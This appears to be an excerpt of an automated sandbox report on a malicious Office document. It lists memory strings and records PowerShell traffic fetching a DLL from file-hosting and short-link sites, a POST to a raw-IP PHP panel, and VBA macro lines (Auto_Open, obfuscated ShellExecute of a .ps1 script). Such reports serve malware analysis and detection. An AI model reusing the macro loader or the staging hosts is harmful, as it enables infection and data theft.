          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://officeapps.live.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://onedrive.live.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://onedrive.live.com/embed?
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://osi.office.net
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://otelrules.azureedge.net
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://outlook.office.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://outlook.office.com/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://outlook.office365.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://outlook.office365.com/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
          Source: PowerShell_transcript.651689.x22XD8Wy.20220114122042.txt.22.drString found in binary or memory: https://p26ynn.blogspot.com/atom.xml
          Source: PowerShell_transcript.651689.TDo_fU7j.20220114122054.txt.27.drString found in binary or memory: https://p6tbbb.blogspot.com/atom.xml
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://pages.store.office.com/review/query
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://powerlift.acompli.net
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://roaming.edog.
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://settings.outlook.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://shell.suite.office.com:1443
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://skyapi.live.net/Activity/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://staging.cortana.ai
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://store.office.cn/addinstemplate
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://store.office.de/addinstemplate
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://tasks.office.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://web.microsoftstream.com/video/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://webshell.suite.office.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://wus2.contentsync.
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://wus2.pagecontentsync.
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://www.odwebp.svc.ms
          Source: aspnet_compiler.exe, 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
          Source: unknownHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 282Expect: 100-continueConnection: Keep-Alive
          Source: unknownDNS traffic detected: queries for: www.j.mp
          Source: global trafficHTTP traffic detected: GET /file/nm9ysba5ejf20r8/6.dll/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.mediafire.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /rm83e8erdqxg/nm9ysba5ejf20r8/6.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: download2262.mediafire.comCookie: ukey=izna1o17t8hk2hcl41rskil668flg4w4Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: p6tbbb.blogspot.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: p26ynn.blogspot.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /file/5avuvurhf9r42y3/6.dll/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.mediafire.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /ugd/5940e4_979408a19b03449f8221c8f8d235fa55.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /u45xa78x9nkg/5avuvurhf9r42y3/6.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: download2262.mediafire.comCookie: ukey=8gv80wkxqbda9mv7zrd52a2eanmh8cy0Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: p6tbbb.blogspot.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /file/5avuvurhf9r42y3/6.dll/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.mediafire.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /1rxjqgtrygkg/5avuvurhf9r42y3/6.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: download2262.mediafire.comCookie: ukey=s7huv8g43j1r0etull8h9ns6aiwyny7lConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /asasdjiasjdiasjasdasddik HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.j.mpConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /asasdjiasjdiasjasdasddik HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bit.lyConnection: Keep-Alive

          System Summary:

          barindex
          Document contains an embedded VBA macro which may execute processesShow sources
          Source: ~DF85570804A0D29ED2.TMP.7.drOLE, VBA macro line: GetObject("new:13709620-C279-11CE-A49E-444553540000").Shellexecute ca.lc.Tag, jojo.jiji.Tag + jiajsijasd, "" , StrReverse("n" + "e" + "p" + "o"), 0
          Document contains an embedded VBA macro with suspicious stringsShow sources
          Source: ~DF85570804A0D29ED2.TMP.7.drOLE, VBA macro line: jiajsijasd = "C:\Users\" & Environ("UserName") & "\Pictures\notnice" + "." + "ps1"
          Source: ~DF85570804A0D29ED2.TMP.7.drOLE, VBA macro line: GetObject("new:13709620-C279-11CE-A49E-444553540000").Shellexecute ca.lc.Tag, jojo.jiji.Tag + jiajsijasd, "" , StrReverse("n" + "e" + "p" + "o"), 0
          Source: ~DF85570804A0D29ED2.TMP.7.drOLE, VBA macro line: Sub Auto_Open()
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeCode function: 31_2_0134B0BA NtQuerySystemInformation,31_2_0134B0BA
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exeCode function: 31_2_0134B089 NtQuerySystemInformation,31_2_0134B089
          Source: ~DF85570804A0D29ED2.TMP.7.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: POWERPNT.box.7.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: ~DF9BC36A1CA590193F.TMP.7.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior